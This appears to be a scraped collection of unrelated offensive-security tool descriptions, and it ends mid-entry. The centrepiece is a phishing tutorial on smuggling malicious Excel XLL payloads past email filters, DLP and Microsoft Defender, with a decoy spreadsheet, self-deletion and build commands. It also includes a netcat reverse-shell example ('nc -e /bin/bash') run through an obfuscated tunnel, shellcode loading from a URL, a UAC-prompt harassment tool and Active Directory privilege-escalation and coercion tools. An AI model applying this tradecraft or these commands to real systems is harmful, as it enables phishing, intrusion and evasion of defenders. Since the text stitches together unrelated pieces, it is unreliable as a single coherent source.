There are two branches within FISSURE to make file navigation easier and reduce code redundancy. The Python2_maint-3.7 branch contains a codebase built around Python2, PyQt4, and GNU Radio 3.7; while the Python3_maint-3.8 branch is built around Python3, PyQt5, and GNU Radio 3.8.
Operating System | FISSURE Branch |
---|---|
Ubuntu 18.04 (x64) | Python2_maint-3.7 |
Ubuntu 18.04.5 (x64) | Python2_maint-3.7 |
Ubuntu 18.04.6 (x64) | Python2_maint-3.7 |
Ubuntu 20.04.1 (x64) | Python3_maint-3.8 |
Ubuntu 20.04.4 (x64) | Python3_maint-3.8 |
In-Progress (beta)
Operating System | FISSURE Branch |
---|---|
Ubuntu 22.04 (x64) | Python3_maint-3.8 |
Note: Certain software tools do not work for every OS. Refer to Software And Conflicts
Installation
git clone https://github.com/ainfosec/fissure.git
cd FISSURE
git checkout <Python2_maint-3.7> or <Python3_maint-3.8>
./install
This will automatically install PyQt software dependencies required to launch the installation GUIs if they are not found.
Next, select the option that best matches your operating system (should be detected automatically if your OS matches an option).
Python2_maint-3.7 | Python3_maint-3.8 |
---|---|
It is recommended to install FISSURE on a clean operating system to avoid existing conflicts. Select all the recommended checkboxes (Default button) to avoid errors while operating the various tools within FISSURE. There will be multiple prompts throughout the installation, mostly asking for elevated permissions and user names. If an item contains a "Verify" section at the end, the installer will run the command that follows and highlight the checkbox item green or red depending on if any errors are produced by the command. Checked items without a "Verify" section will remain black following the installation.
Usage
fissure
Refer to the FISSURE Help menu for more details on usage.
Components
Capabilities
Signal Detector
IQ Manipulation
Pattern Recognition
Attacks
Fuzzing
Signal Playlists
Image Gallery
Packet Crafting
Scapy Integration
CRC Calculator
Logging
FISSURE comes with several helpful guides to become familiar with different technologies and techniques. Many include steps for using various tools that are integrated into FISSURE.
Suggestions for improving FISSURE are strongly encouraged. Leave a comment in the Discussions page if you have any thoughts regarding the following:
Contributions to improve FISSURE are crucial to expediting its development. Any contributions you make are greatly appreciated. If you wish to contribute through code development, please fork the repo and create a pull request:
git checkout -b feature/AmazingFeature
)git commit -m 'Add some AmazingFeature'
)git push origin feature/AmazingFeature
)Creating Issues to bring attention to bugs is also welcomed.
Contact Assured Information Security, Inc. (AIS) Business Development to propose and formalize any FISSURE collaboration opportunities–whether that is through dedicating time towards integrating your software, having the talented people at AIS develop solutions for your technical challenges, or integrating FISSURE into other platforms/applications.
GPL-3.0
For license details, see LICENSE file.
Follow on Twitter: @FissureRF, @AinfoSec
Chris Poore - Assured Information Security, Inc. - poorec@ainfosec.com
Business Development - Assured Information Security, Inc. - bd@ainfosec.com
Special thanks to Dr. Samuel Mantravadi and Joseph Reith for their contributions to this project.
A PoC implementation for an evasion technique to terminate the current thread and restore it before resuming execution, while implementing page protection changes during no execution.
Sleep and obfuscation methods are well known in the maldev community, with different implementations, they have the objective of hiding from memory scanners while sleeping, usually changing page protections and even adding cool features like encrypting the shellcode, but there is another important point to hide our shellcode, and is hiding the current execution thread. Spoofing the stack is cool, but after thinking a little about it I thought that there is no need to spoof the stack… if there is no stack :)
The usability of this technique is left to the reader to assess, but in any case, I think it is a cool way to review some topics, and learn some maldev for those who, like me, are starting in this world.
The main implementation showed here holds everything that we need to take out of the stack in the data section, as global variables, but an impletementation moving everything to the heap will be published soon. It aims to show some key modifications that needs to be done to make this code pic and injectable.
This repository is mirrored between GitHub and GitLab.
With Microsoft's recent announcement regarding the blocking of macros in documents originating from the internet (email AND web download), attackers have began aggressively exploring other options to achieve user driven access (UDA). There are several considerations to be weighed and balanced when looking for a viable phishing for access method:
These are the major questions, however there are certainly more. Things get more complex as you realize that these factors compound each other; for example, if a client has a web proxy that prohibits the download of executables or DLL's, you may need to stick your payload inside a container (ZIP, ISO, etc). Doing so can present further issues down the road when it comes to detection. More robust defenses require more complex combinations of techniques to defeat.
This article will be written with a fictional target organization in mind; this organization has employed several defensive measures including email filtering rules, blacklisting certain file types from being downloaded, application whitelisting on endpoints, and Microsoft Defender for Endpoint as an EDR solution.
Real organizations may employ none of these, some, or even more defenses which can simplify or complicate the techniques outlined in this research. As always, know your target.
XLL's are DLL's, specifically crafted for Microsoft Excel. To the untrained eye they look a lot like normal excel documents.
XLL's provide a very attractive option for UDA given that they are executed by Microsoft Excel, a very commonly encountered software in client networks; as an additional bonus, because they are executed by Excel, our payload will almost assuredly bypass Application Whitelisting rules because a trusted application (Excel) is executing it. XLL's can be written in C, C++, or C# which provides a great deal more flexibility and power (and sanity) than VBA macros which further makes them a desirable choice.
The downside of course is that there are very few legitimate uses for XLL's, so it SHOULD be a very easy box to check for organizations to block the download of that file extension through both email and web download. Sadly many organizations are years behind the curve and as such XLL's stand to be a viable method of phishing for some time.
There are a series of different events that can be used to execute code within an XLL, the most notable of which is xlAutoOpen. The full list may be seen here:
Upon double clicking an XLL, the user is greeted by this screen:
This single dialog box is all that stands between the user and code execution; with fairly thin social engineering, code execution is all but assured.
Something that must be kept in mind is that XLL's, being executables, are architecture specific. This means that you must know your target; the version of Microsoft Office/Excel that the target organization utilizes will (usually) dictate what architecture you need to build your payload for.
There is a pretty clean break in Office versions that can be used as a rule of thumb:
Office 2016 or earlier: x86
Office 2019 or later: x64
It should be noted that it is possible to install the other architecture for each product, however these are the default architectures installed and in most cases this should be a reliable way to make a decision about which architecture to roll your XLL for. Of course depending on the delivery method and pretexting used as part of the phishing campaign, it is possible to provide both versions and rely on the victim to select the appropriate version for their system.
The XLL payload that was built during this research was based on this project by edparcell. His repository has good instructions on getting started with XLL's in Visual Studio, and I used his code as a starting point to develop a malicious XLL file.
A notable deviation from his repository is that should you wish to create your own XLL project, you will need to download the latest Excel SDK and then follow the instructions on the previously linked repo using this version as opposed to the 2010 version of the SDK mentioned in the README.
Delivery of the payload is a serious consideration in context of UDA. There are two primary methods we will focus on:
Either via attaching a file or including a link to a website where a file may be downloaded, email is a critical part of the UDA process. Over the years many organizations (and email providers) have matured and enforced rules to protect users and organizations from malicious attachments. Mileage will vary, but organizations now have the capability to:
Fuzzing an organization's email rules can be an important part of an engagement, however care must always be taken so as to not tip one's hand that a Red Team operation is ongoing and that information is actively being gathered.
For the purposes of this article, it will be assumed that the target organization has robust email attachment rules that prevent the delivery of an XLL payload. We will pivot and look at web delivery.
Email will still be used in this attack vector, however rather than sending an attachment it will be used to send a link to a website. Web proxy rules and network mitigations controlling allowed file download types can differ from those enforced in regards to email attachments. For the purposes of this article, it is assumed that the organization prevents the download of executable files (MZ headers) from the web. This being the case, it is worth exploring packers/containers.
The premise is that we might be able to stick our executable inside another file type and smuggle it past the organization's policies. A major consideration here is native support for the file type; 7Z files for example cannot be opened by Windows without installing third party software, so they are not a great choice. Formats like ZIP, ISO, and IMG are attractive choices because they are supported natively by Windows, and as an added bonus they add very few extra steps for the victim.
The organization unfortunately blocks ISO's and IMG's from being downloaded from the web; additionally, because they employ Data Loss Prevention (DLP) users are unable to mount external storage devices, which ISO's and IMG's are considered.
Luckily for us, even though the organization prevents the download of MZ-headered files, it does allow the download of zip files containing executables. These zip files are actively scanned for malware, to include prompting the user for the password for password-protected zip files; however because the executable is zipped it is not blocked by the otherwise blanket deny for MZ files.
Zip files were chosen as a container for our XLL payload because:
Conveniently, double clicking a ZIP file on Windows will open that zip file in File Explorer:
Less conveniently, double clicking the XLL file from the zipped location triggers Windows Defender; even using the stock project from edparcell that doesn't contain any kind of malicious code.
Looking at the Windows Defender alert we see it is just a generic "Wacatac" alert:
However there is something odd; the file it identified as malicious was in c:\users\user\Appdata\Local\Temp\Temp1_ZippedXLL.zip, not C:\users\user\Downloads\ZippedXLL\ where we double clicked it. Looking at the Excel instance in ProcessExplorer shows that Excel is actually running the XLL from appdata\local\temp, not from the ZIP file that it came in:
This appears to be a wrinkle associated with ZIP files, not XLL's. Opening a TXT file from within a zip using notepad also results in the TXT file being copied to appdata\local\temp and opened from there. While opening a text file from this location is fine, Defender seems to identify any sort of actual code execution in this location as malicious.
If a user were to extract the XLL from the ZIP file and then run it, it will execute without any issue; however there is no way to guarantee that a user does this, and we really can't roll the dice on popping AV/EDR should they not extract it. Besides, double clicking the ZIP and then double clicking the XLL is far simpler and a victim is far more prone to complete those simple actions than go to the trouble of extracting the ZIP.
This problem caused me to begin considering a different payload type than XLL; I began exploring VSTO's, which are Visual Studio Templates for Office. I highly encourage you to check out that article.
VSTO's ultimately call a DLL which can either be located locally with the .XLSX that initiates everything, or hosted remotely and downloaded by the .XLSX via http/https. The local option provides no real advantages (and in fact several disadvantages in that there are several more files associated with a VSTO attack), and the remote option unfortunately requires a code signing certificate or for the remote location to be a trusted network. Not having a valid code signing cert, VSTO's do not mitigate any of the issues in this scenario that our XLL payload is running into.
We really seem to be backed into a corner here. Running the XLL itself is fine, however the XLL cannot be delivered by itself to the victim either via email attachment or web download due to organization policy. The XLL needs to be packaged inside a container, however due to DLP formats like ISO, IMG, and VHD are not viable. The victim needs to be able to open the container natively without any third party software, which really leaves ZIP as the option; however as discussed, running the XLL from a zipped folder results in it being copied and ran from appdata\local\temp which flags AV.
I spent many hours brain storming and testing things, going down the VSTO rabbit hole, exploring all conceivable options until I finally decided to try something so dumb it just might work.
This time I created a folder, placed the XLL inside it, and then zipped the folder:
Clicking into the folder reveals the XLL file:
Double clicking the XLL shows the Add-In prompt from Excel. Note that the XLL is still copied to appdata\local\temp, however there is an additional layer due to the extra folder that we created:
Clicking enable executes our code without flagging Defender:
Nice! Code execution. Now what?
The pretexting involved in getting a victim to download and execute the XLL will vary wildly based on the organization and delivery method; themes might include employee salary data, calculators for compensation based on skillset, information on a project, an attendee roster for an event, etc. Whatever the lure, our attack will be a lot more effective if we actually provide the victim with what they have been promised. Without follow through, victims may become suspicious and report the document to their security teams which can quickly give the attacker away and curtail access to the target system.
The XLL by itself will just leave a blank Excel window after our code is done executing; it would be much better for us to provide the Excel Spreadsheet that the victim is looking for.
We can embed our XLSX as a byte array inside the XLL; when the XLL executes, it will drop the XLSX to disk beside the XLL after which it will be opened. We will name the XLSX the same as the XLL, the only difference being the extension.
Given that our XLL is written in C, we can bring in some of the capabilities from a previous writeup I did on Payload Capabilities in C, namely Self-Deletion. Combining these two techniques results in the XLL being deleted from disk, and the XLSX of the same name being dropped in it's place. To the undiscerning eye, it will appear that the XLSX was there the entire time.
Unfortunately the location where the XLL is deleted and the XLSX dropped is the appdata\temp\local folder, not the original ZIP; to address this we can create a second ZIP containing the XLSX alone and also read it into a byte array within the XLL. On execution in addition to the aforementioned actions, the XLL could try and locate the original ZIP file in c:\users\victim\Downloads\ and delete it before dropping the second ZIP containing just the XLSX in it's place. This could of course fail if the user saved the original ZIP in a different location or under a different name, however in many/most cases it should drop in the user's downloads folder automatically.
This screenshot shows in the lower pane the temp folder created in appdata\local\temp containing the XLL and the dropped XLSX, while the top pane shows the original File Explorer window from which the XLL was opened. Notice in the lower pane that the XLL has size 0. This is because it deleted itself during execution, however until the top pane is closed the XLL file will not completely disappear from the appdata\local\temp location. Even if the victim were to click the XLL again, it is now inert and does not really exist.
Similarly, as soon as the victim backs out of the opened ZIP in File Explorer (either by closing it or navigating to a different folder), should they click spreadsheet.zip again they will now find that the test folder contains importantdoc.xlsx; so the XLL has been removed and replaced by the harmless XLSX in both locations that it existed on disk.
This GIF demonstrates the download and execution of the XLL on an MDE trial VM. Note that for some reason Excel opens two instances here; on my home computer it only opened one, so not quite sure why that differs.
As always, we will ask "What does MDE see?"
A quick screenshot dump to prove that I did execute this on target and catch a beacon back on TestMachine11:
First off, zero alerts:
What does the timeline/event log capture?
Yikes. Truth be told I have no idea where the keylogging, encrypting, and decrypting credentials alerts are coming from as my code doesn't do any of that. Our actions sure look suspicious when laid out like this, but I will again comment on just how much data is collected by MDE on a single endpoint, let alone hundreds, thousands, or hundreds of thousands that an organization may have hooked into the EDR. So long as we aren't throwing any actual alerts, we are probably ok.
The moment most have probably been waiting for, I am providing a code sample of my developed XLL runner, limited to just those parts discussed here in the Tradecraft section. It will be on the reader to actually get the code into an XLL and implement it in conjunction with the rest of their runner. As always, do no harm, have permission to phish an organization, etc.
I have included the source code for a program that will ingest a file and produce hex which can be copied into the byte arrays defined in the snippet. Use this on the the XLSX you wish to present to the user, as well as the ZIP file containing the folder which contains that same XLSX and store them in their respective byte arrays. Compile this code using:
gcc -o ingestfile ingestfile.c
I had some issues getting my XLL's to compile using MingW on a kali machine so thought I would post the commands here:
x64
x86_64-w64-mingw32-gcc snippet.c 2013_Office_System_Developer_Resources/Excel2013XLLSDK/LIB/x64/XLCALL32.LIB -o importantdoc.xll -s -Os -DUNICODE -shared -I 2013_Office_System_Developer_Resources/Excel2013XLLSDK/INCLUDE/
x86
i686-w64-mingw32-gcc snippet.c 2013_Office_System_Developer_Resources/Excel2013XLLSDK/LIB/XLCALL32.LIB -o HelloWorldXll.xll -s -DUNICODE -Os -shared -I 2013_Office_System_Developer_Resources/Excel2013XLLSDK/INCLUDE/
After you compile you will want to make a new folder and copy the XLL into that folder. Then zip it using:
zip -r <myzipname>.zip <foldername>/
Note that in order for the tradecraft outlined in this post to work, you are going to need to match some variables in the code snippet to what you name the XLL and the zip file.
With the dominance of Office Macro's coming to a close, XLL's present an attractive option for phishing campaigns. With some creativity they can be used in conjunction with other techniques to bypass many layers of defenses implemented by organizations and security teams. Thank you for reading and I hope you learned something useful!
This was a learning by doing project from my side. Well known techniques are used to built just another impersonation tool with some improvements in comparison to other public tools. The code base was taken from:
A blog post for the intruduction can be found here:
PS > PS C:\temp> SharpImpersonation.exe list
PS > PS C:\temp> SharpImpersonation.exe list elevated
PS > PS C:\temp> SharpImpersonation.exe user:<user> binary:<binary-Path>
PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<base64shellcode>
PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<URL>
PS > PS C:\temp> SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser
_____ ____ ____ _
/ ___// __ \____ ____ ___ / __ \(_)_____________ _ _____ _____
\__ \/ / / / __ \/ __ `__ \/ / / / / ___/ ___/ __ \ | / / _ \/ ___/
___/ / /_/ / /_/ / / / / / / /_/ / (__ ) /__/ /_/ / |/ / __/ /
/____/_____/\____/_/ /_/ /_/_____/_/____/\___/\____/|___/\___/_/
A easy-to-use python tool to perform dns recon with multiple options
It can be installed in any OS with python3
Manual installation
git clone https://github.com/D3Ext/SDomDiscover
cd SDomDiscover
pip3 install -r requirements.txt
One-liner
git clone https://github.com/D3Ext/SDomDiscover && cd SDomDiscover && pip3 install -r requirements.txt && python3 SDomDiscover.py
Common usages
To see the help panel and other parameters
python3 SDomDiscover.py -h
Main usage of the tool to dump the valid domains in the SSL certificate
python3 SDomDiscover.py -d example.com
Used to perform all the queries and recognizement
python3 SDomDiscover.py -d domain.com --all
Pinecone is a WLAN networks auditing tool, suitable for red team usage. It is extensible via modules, and it is designed to be run in Debian-based operating systems. Pinecone is specially oriented to be used with a Raspberry Pi, as a portable wireless auditing box.
This tool is designed for educational and research purposes only. Only use it with explicit permission.
For running Pinecone, you need a Debian-based operating system (it has been tested on Raspbian, Raspberry Pi Desktop and Kali Linux). Pinecone has the following requirements:
apt-get install python3
.apt-get install dnsmasq
.apt-get install hostapd-wpe
. If your distribution repository does not have a hostapd-wpe package, you can either try to install it using a Kali Linux repository pre-compiled package, or compile it from its source code.After installing the necessary packages, you can install the Python packages requirements for Pinecone using pip3 install -r requirements.txt
in the project root folder.
For starting Pinecone, execute python3 pinecone.py
from within the project root folder:
root@kali:~/pinecone# python pinecone.py
[i] Database file: ~/pinecone/db/database.sqlite
pinecone >
Pinecone is controlled via a Metasploit-like command-line interface. You can type help
to get the list of available commands, or help 'command'
to get more information about a specific command:
pinecone > help
Documented commands (type help <topic>):
========================================
alias help load pyscript set shortcuts use
edit history py quit shell unalias
Undocumented commands:
======================
back run stop
pinecone > help use
Usage: use module [-h]
Interact with the specified module.
positional arguments:
module module ID
optional arguments:
-h, --help show this help message and exit
Use the command use 'moduleID'
to activate a Pinecone module. You can use Tab auto-completion to see the list of current loaded modules:
pinecone > use
attack/deauth daemon/hostapd-wpe report/db2json scripts/infrastructure/ap
daemon/dnsmasq discovery/recon scripts/attack/wpa_handshake
pinecone > use discovery/recon
pcn module(discovery/recon) >
Every module has options, that can be seen typing help run
or run --help
when a module is activated. Most modules have default values for their options (check them before running):
pcn module(discovery/recon) > help run
usage: run [-h] [-i INTERFACE]
optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --iface INTERFACE
monitor mode capable WLAN interface (default: wlan0)
When a module is activated, you can use the run [options...]
command to start its functionality. The modules provide feedback of their execution state:
pcn script(attack/wpa_handshake) > run -s TEST_SSID
[i] Sending 64 deauth frames to all clients from AP 00:11:22:33:44:55 on channel 1...
................................................................
Sent 64 packets.
[i] Monitoring for 10 secs on channel 1 WPA handshakes between all clients and AP 00:11:22:33:44:55...
If the module runs in background (for example, scripts/infrastructure/ap), you can stop it using the stop
command when the module is running:
back
command. You can also activate another module issuing the use
command again. Shell commands may be executed with the command shell
or the !
shortcut:
pinecone > !ls
LICENSE modules module_template.py pinecone pinecone.py README.md requirements.txt TODO.md
Currently, Pinecone reconnaissance SQLite database is stored in the db/ directory inside the project root folder. All the temporary files that Pinecone needs to use are stored in the tmp/ directory also under the project root folder.
PersistenceSniper is a Powershell script that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines. The script is also available on Powershell Gallery. |
Why writing such a tool, you might ask. Well, for starters, I tried looking around and I did not find a tool which suited my particular use case, which was looking for known persistence techniques, automatically, across multiple machines, while also being able to quickly and easily parse and compare results. Sure, Sysinternals' Autoruns is an amazing tool and it's definitely worth using, but, given it outputs results in non-standard formats and can't be run remotely unless you do some shenanigans with its command line equivalent, I did not find it a good fit for me. Plus, some of the techniques I implemented so far in PersistenceSniper have not been implemented into Autoruns yet, as far as I know. Anyway, if what you need is an easy to use, GUI based tool with lots of already implemented features, Autoruns is the way to go, otherwise let PersistenceSniper have a shot, it won't miss it :)
Using PersistenceSniper is as simple as:
PS C:\> git clone https://github.com/last-byte/PersistenceSniper
PS C:\> Import-Module .\PersistenceSniper\PersistenceSniper\PersistenceSniper.psd1
PS C:\> Find-AllPersistence
If you need a detailed explanation of how to use the tool or which parameters are available and how they work, PersistenceSniper's Find-AllPersistence
supports Powershell's help features, so you can get detailed, updated help by using the following command after importing the module:
Get-Help -Name Find-AllPersistence -Full
PersistenceSniper's Find-AllPersistence
returns an array of objects of type PSCustomObject with the following properties:
PS C:\> Find-AllPersistence | Where-Object "Access Gained" -EQ "System"
Of course, being PersistenceSniper a Powershell-based tool, some cool tricks can be performed, like passing its output to Out-GridView
in order to have a GUI-based table to interact with.
As already introduced, Find-AllPersistence
outputs an array of Powershell Custom Objects. Each object has the following properties, which can be used to filter, sort and better understand the different techniques the function looks for:
Find-AllPersistence
without a -ComputerName
parameter, PersistenceSniper will run only on the local machine. Otherwise it will run on the remote computer(s) you specify;Let's face it, hunting for persistence techniques also comes with having to deal with a lot of false positives. This happens because, while some techniques are almost never legimately used, many indeed are by legit software which needs to autorun on system boot or user login.
This poses a challenge, which in many environments can be tackled by creating a CSV file containing known false positives. If your organization deploys systems using something like a golden image, you can run PersistenceSniper on a system you just created, get a CSV of the results and use it to filter out results on other machines. This approach comes with the following benefits:
Find-AllPersistence
comes with parameters allowing direct output of the findings to a CSV file, while also being able to take a CSV file as input and diffing the results.
PS C:\> Find-AllPersistence -DiffCSV false_positives.csv
One cool way to use PersistenceSniper my mate Riccardo suggested is to use it in an incremental way: you could setup a Scheduled Task which runs every X hours, takes in the output of the previous iteration through the -DiffCSV
parameter and outputs the results to a new CSV. By keeping track of the incremental changes, you should be able to spot within a reasonably small time frame new persistences implanted on the machine you are monitoring.
The topic of persistence, especially on Windows machines, is one of those which see new discoveries basically every other week. Given the sheer amount of persistence techniques found so far by researchers, I am still in the process of implementing them. So far the following 31 techniques have been implemented successfully:
The techniques implemented in this script have already been published by skilled researchers around the globe, so it's right to give credit where credit's due. This project wouldn't be around if it weren't for:
I'd also like to give credits to my fellow mates at @APTortellini, in particular Riccardo Ancarani, for the flood of ideas that helped it grow from a puny text-oriented script to a full-fledged Powershell tool.
This project is under the CC0 1.0 Universal license. TL;DR: you can copy, modify, distribute and perform the work, even for commercial purposes, all without asking permission.
A Nim implementation of reflective PE-Loading from memory. The base for this code was taken from RunPE-In-Memory - which I ported to Nim.
You'll need to install the following dependencies:
nimble install ptr_math winim
I did test this with Nim Version 1.6.2 only, so use that version for testing or I cannot guarantee no errors when using another version.
If you want to pass arguments on runtime or don't want to pass arguments at all compile via:
nim c NimRunPE.nim
If you want to hardcode custom arguments modify const exeArgs
to your needs and compile with:
nim c -d:args NimRunPE.nim
- this was contributed by @glynx, thanks!
The technique itself it pretty old, but I didn't find a Nim implementation yet. So this has changed now. :)
If you plan to load e.g. Mimikatz with this technique - make sure to compile a version from source on your own, as the release binaries don't accept arguments after being loaded reflectively by this loader. Why? I really don't know it's strange but a fact. If you compile on your own it will still work:
My private Packer is also weaponized with this technique - but all Win32 functions are replaced with Syscalls there. That makes the technique stealthier.
Graph Crawler is the most powerful automated testing toolkit for any GraphQL endpoint.
NEW: Can search for endpoints for you using Escape Technology's powerful Graphinder tool. Just point it towards a domain and add the '-e' option and Graphinder will do subdomain enumeration + search popular directories for GraphQL endpoints. After all this GraphCrawler will take over and work through each find.
It will run through and check if mutation is enabled, check for any sensitive queries available, such as users and files, and it will also test any easy queries it find to see if authentication is required.
If introspection is not enabled on the endpoint it will check if it is an Apollo Server and then can run Clairvoyance to brute force and grab the suggestions to try to build the schema ourselves. (See the Clairvoyance project for greater details on this). It will then score the findings 1-10 with 10 being the most critical.
If you want to dig deeper into the schema you can also use graphql-path-enum to look for paths to certain types, like user IDs, emails, etc.
I hope this saves you as much time as it has for me
python graphCrawler.py -u https://test.com/graphql/api -o <fileName> -a "<headers>"
██████╗ ██████╗ █████╗ ██████╗ ██╗ ██╗ ██████╗██████╗ █████╗ ██╗ ██╗██╗ ███████╗██████╗
██╔════╝ ██╔══██╗██╔══██╗██╔══██╗██║ ██║██╔════╝██╔══██╗██╔══██╗██║ ██║██║ ██╔════╝██╔══██╗
██║ ███╗██████╔╝███████║██████╔╝███████║██║ ██████╔╝███████║██║ █╗ ██║██║ █████╗ ██████╔╝
██║ ██║██╔══██╗██╔══██║██╔═══╝ ██╔══██║██║ ██╔══██╗██╔══██║██║███╗██║██║ ██╔══╝ ██╔══██╗
╚██████╔╝██║ ██║██║ ██║██║ ██║ ██║╚██████╗██║ ██║██║ ██║╚███╔███╔╝███████╗███████╗██║ ██║
╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚══╝╚══╝ ╚══════╝╚══════╝╚═╝ ╚═╝
The output option is not required and by default it will output to schema.json
Wordlist from google-10000-english
Tunnel port to port traffic via an obfuscated channel with AES-GCM encryption.
Obfuscation Modes
AES-GCM is enabled by default for each of the options above.
Usage
root@WOPR-KALI:/opt/gohide-dev# ./gohide -h
Usage of ./gohide:
-f string
listen fake server -r x.x.x.x:xxxx (ip/domain:port) (default "0.0.0.0:8081")
-key openssl passwd -1 -salt ok | md5sum
aes encryption secret: use '-k openssl passwd -1 -salt ok | md5sum' to derive key from password (default "5fe10ae58c5ad02a6113305f4e702d07")
-l string
listen port forward -l x.x.x.x:xxxx (ip/domain:port) (default "127.0.0.1:8080")
-m string
obfuscation mode (AES encrypted by default): websocket-client, websocket-server, http-client, http-server, none (default "none")
-pem string
path to .pem for TLS encryption mode: default = use hardcoded key pair 'CN:target.com', none = plaintext mode (default "default")
-r string
forward to remote fake server -r x.x.x.x:xxxx (ip/domain:port) (default "127.0.0.1:9999")
Scenario
Box A - Reverse Handler.
root@WOPR-KALI:/opt/gohide# ./gohide -f 0.0.0.0:8081 -l 127.0.0.1:8080 -r target.com:9091 -m websocket-client
Local Port Forward Listening: 127.0.0.1:8080
FakeSrv Listening: 0.0.0.0:8081
Box B - Target.
root@WOPR-KALI:/opt/gohide# ./gohide -f 0.0.0.0:9091 -l 127.0.0.1:9090 -r target.com:8081 -m websocket-server
Local Port Forward Listening: 127.0.0.1:9090
FakeSrv Listening: 0.0.0.0:9091
Note: /etc/hosts "127.0.0.1 target.com"
Box B - Netcat /bin/bash
root@WOPR-KALI:/var/tmp# nc -e /bin/bash 127.0.0.1 9090
Box A - Netcat client
root@WOPR-KALI:/opt/gohide# nc -v 127.0.0.1 8080
localhost [127.0.0.1] 8080 (http-alt) open
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux WOPR-KALI 5.3.0-kali2-amd64 #1 SMP Debian 5.3.9-1kali1 (2019-11-11) x86_64 GNU/Linux
netstat -pantwu
Active Internet connections (servers and established)
tcp 0 0 127.0.0.1:39684 127.0.0.1:8081 ESTABLISHED 14334/./gohide
Obfuscation Samples
websocket-client (Box A to Box B)
GET /news/api/latest HTTP/1.1
Host: cdn-tb0.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: 6jZS+0Wg1IP3n33RievbomIuvh5ZdNMPjVowXm62
Sec-WebSocket-Version: 13
websocket-server (Box B to Box A)
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: URrP5l0Z3NIHXi+isjuIyTSKfoP60Vw5d2gqcmI=
http-client
GET /news/api/latest HTTP/1.1
Host: cdn-tbn0.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://www.bbc.co.uk/
Connection: keep-alive
Cookie: Session=R7IJ8y/EBgCanTo6fc0fxhNVDA27PFXYberJNW29; Secure; HttpOnly
http-server
HTTP/2.0 200 OK
content-encoding: gzip
content-type: text/html; charset=utf-8
pragma: no-cache
server: nginx
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
cache-control: no-cache, no-store, must-revalidate
expires: Thu, 21 Nov 2019 01:07:15 GMT
date: Thu, 21 Nov 2019 01:07:15 GMT
content-length: 30330
vary: Accept-Encoding
X-Firefox-Spdy: h2
Set-Cookie: Session=gWMnQhh+1vkllaOxueOXx9/rLkpf3cmh5uUCmHhy; Secure; Path=/; HttpOnly
none
8JWxXufVora2FNa/8m2Vnub6oiA2raV4Q5tUELJA
Future
Enjoy~
ForceAdmin is a c# payload builder, creating infinate UAC pop-ups until the user allows the program to be ran. The inputted commands are ran via powershell calling cmd.exe and should be using the batch syntax. Why use? Well some users have UAC set to always show, so UAC bypass techniques are not possible. However - this attack will force them to run as admin. Bypassing these settings.
For building on your own, the following NuGet packages are needed
Fody
: "Extensible tool for weaving .net assemblies."Costura.Fody
"Fody add-in for embedding references as resources."Microsoft.AspNet.WebApi.Client
"This package adds support for formatting and content negotiation to System.Net.Http. It includes support for JSON, XML, and form URL encoded data."You can download the latest tarball by clicking here or latest zipball by clicking here.
Download the project:
$ git clone https://github.com/catzsec/ForceAdmin.git
Enter the project folder
$ cd ForceAdmin
Run ForceAdmin:
$ dotnet run
Compile ForceAdmin:
$ dotnet publish -r win-x64 -c Release -o ./publish/
Any questions, errors or solutions, create an Issue in the Issues tab.
A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods.
--analyze
, which only lists the vulnerable protocols and functions listening, without performing a coerced authentication.--targets-file
--webdav-host
and --webdav-port
$ ./Coercer.py -h
______
/ ____/___ ___ _____________ _____
/ / / __ \/ _ \/ ___/ ___/ _ \/ ___/
/ /___/ /_/ / __/ / / /__/ __/ / v1.6
\____/\____/\___/_/ \___/\___/_/ by @podalirius_
usage: Coercer.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [--hashes [LMHASH]:NTHASH] [--no-pass] [-v] [-a] [-k] [--dc-ip ip address] [-l LISTENER] [-wh WEBDAV_HOST] [-wp WEBDAV_PORT]
(-t TARGET | -f TARGETS_FILE) [--target-ip ip address]
Automatic windows authentication coercer over various RPC calls.
options:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
Username to authenticate to the endpoint.
-p PASSWORD, --password PASSWORD
Password to authenticate to the endpoint. (if omitted, it will be asked unless -no-pass is specified)
-d DOMAIN, --domain DOMAIN
Windows domain name to authenticate to the endpoint.
--hashes [LMHASH]:NTHASH
NT/LM hashes (LM hash can be empty)
--no-pass Don't ask for password (useful for -k)
-v, --verbose Verbose mode (default: False)
-a, --analyze Analyze mode (default: Attack mode)
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the
command line
--dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-t TARGET, --target TARGET
IP address or hostname of the target machine
-f TARGETS_FILE, --targets-file TARGETS_FILE
IP address or hostname of the target machine
--target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it
-l LISTENER, --listener LISTENER
IP address or hostname of the listener machine
-wh WEBDAV_HOST, --webdav-host WEBDAV_HOST
WebDAV IP of the server to authenticate to.
-wp WEBDAV_PORT, --webdav-port WEBDAV_PORT
WebDAV port of the server to authenticate to.
In attack mode (without --analyze
option) you get the following output:
After all the RPC calls, you get plenty of authentications in Responder:
Pull requests are welcome. Feel free to open an issue if you want to add other features.
Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
Changed from sam-the-admin.
SAM THE ADMIN CVE-2021-42278 + CVE-2021-42287 chain
positional arguments:
